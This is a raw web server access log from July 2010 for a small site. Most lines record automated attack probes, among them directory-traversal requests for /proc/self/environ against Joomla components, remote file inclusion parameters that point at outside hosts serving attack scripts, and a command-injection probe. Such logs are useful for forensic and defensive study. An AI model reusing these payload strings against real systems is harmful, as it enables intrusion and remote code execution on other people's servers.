83.149.110.213 - - [26/Jul/2010:01:16:29 -0700] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:16:29 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:16:31 -0700] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:16:31 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:16:39 -0700] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:16:39 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:16:41 -0700] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:16:41 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:17:39 -0700] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:17:39 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:17:41 -0700] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:17:42 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:18:00 -0700] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:01:18:00 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.206 - - [26/Jul/2010:01:21:15 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
114.38.65.141 - - [26/Jul/2010:01:24:33 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.114.107 - - [26/Jul/2010:01:25:32 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [26/Jul/2010:01:43:03 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [26/Jul/2010:01:50:28 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
116.30.39.73 - - [26/Jul/2010:01:54:08 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
66.163.171.205 - - [26/Jul/2010:02:00:30 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:07:35 -0700] "GET /!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:09:30 -0700] "GET /logs/access.log/!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:09:31 -0700] "GET /!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:09:42 -0700] "GET /logs/!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
121.35.173.19 - - [26/Jul/2010:02:10:28 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:10:29 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:10:29 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:10:29 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:11:12 -0700] "GET /logs/!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:11:12 -0700] "GET /!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:12:50 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:13:43 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:13:43 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:14:49 -0700] "GET /logs/access.log/!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:14:49 -0700] "GET /!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:14:50 -0700] "GET /logs/!scan2http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.106 - - [26/Jul/2010:02:15:25 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:26:07 -0700] "GET /logs/access_100614.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.joopjr.nl/em/ipays/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.redneckmba.com"
94.23.215.207 - - [26/Jul/2010:02:28:09 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.23.215.207 - - [26/Jul/2010:02:28:09 -0700] "GET /ashnews.php?pathtoashnews=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.23.215.207 - - [26/Jul/2010:02:28:09 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.23.215.207 - - [26/Jul/2010:02:28:10 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.23.215.207 - - [26/Jul/2010:02:28:10 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.23.215.207 - - [26/Jul/2010:02:28:10 -0700] "GET /ashnews.php?pathtoashnews=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:29:45 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:29:45 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
89.207.74.195 - - [26/Jul/2010:02:29:45 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.105 - - [26/Jul/2010:02:39:45 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [26/Jul/2010:02:40:59 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [26/Jul/2010:02:41:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
222.124.193.12 - - [26/Jul/2010:03:03:28 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.106 - - [26/Jul/2010:03:04:50 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
208.80.193.121 - - [26/Jul/2010:03:07:07 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AT&T CSM 6.0; SV1; .NET CLR 1.0.3705)" "redneckmba.com"
66.163.171.206 - - [26/Jul/2010:03:22:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.207.74.195 - - [26/Jul/2010:03:26:10 -0700] "GET /logs/access_100614.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.joopjr.nl/em/ipays/load.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
89.108.64.192 - - [26/Jul/2010:03:28:51 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [26/Jul/2010:03:28:51 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [26/Jul/2010:03:28:51 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [26/Jul/2010:03:29:28 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
76.13.114.107 - - [26/Jul/2010:03:29:28 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [26/Jul/2010:03:41:32 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
91.121.7.123 - - [26/Jul/2010:03:42:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:03:43:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:03:44:08 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
123.204.157.54 - - [26/Jul/2010:03:48:04 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.114.107 - - [26/Jul/2010:03:54:09 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
91.121.7.123 - - [26/Jul/2010:03:55:54 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
91.121.7.123 - - [26/Jul/2010:03:55:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
91.121.7.123 - - [26/Jul/2010:03:55:54 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:03:56:31 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:03:56:31 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:03:56:31 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:03:56:31 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:03:56:31 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:03:56:31 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
66.163.171.207 - - [26/Jul/2010:04:05:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [26/Jul/2010:04:20:14 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
122.155.9.169 - - [26/Jul/2010:04:24:43 -0700] "GET /errors.php?error=http://rollax.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
122.155.9.169 - - [26/Jul/2010:04:24:45 -0700] "GET /logs/errors.php?error=http://rollax.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.194 - - [26/Jul/2010:04:44:16 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [26/Jul/2010:04:44:30 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
95.211.71.21 - - [26/Jul/2010:04:46:55 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
95.211.71.21 - - [26/Jul/2010:04:46:55 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
173.212.242.11 - - [26/Jul/2010:04:50:30 -0700] "GET /?_PHPLIB[libdir]=http://www.loskalakis.com/fx29id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
173.212.242.11 - - [26/Jul/2010:04:50:30 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.loskalakis.com/fx29id1.txt?? HTTP/1.1" 200 2087 "-" "Mozilla/5.0" "www.redneckmba.com"
173.212.242.11 - - [26/Jul/2010:04:50:31 -0700] "GET /logs/access.log%20%20//?_PHPLIB[libdir]=http://www.loskalakis.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:04:51:10 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:04:51:10 -0700] "GET /logs/access.log%20%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:04:51:10 -0700] "GET /logs/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:04:51:10 -0700] "GET /logs/index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:04:51:10 -0700] "GET /logs/access.log%20%20/index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:04:51:10 -0700] "GET /index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
66.163.171.206 - - [26/Jul/2010:04:51:51 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:54:15 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:54:15 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:54:15 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:54:19 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:54:25 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:54:25 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:54:37 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:54:38 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:57:37 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:57:37 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:58:22 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:04:58:22 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:05:00:40 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:05:00:41 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:05:00:49 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:05:00:49 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:05:00:49 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:05:00:49 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:05:01:32 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:05:01:33 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:05:01:37 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [26/Jul/2010:05:01:37 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:05:06:03 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
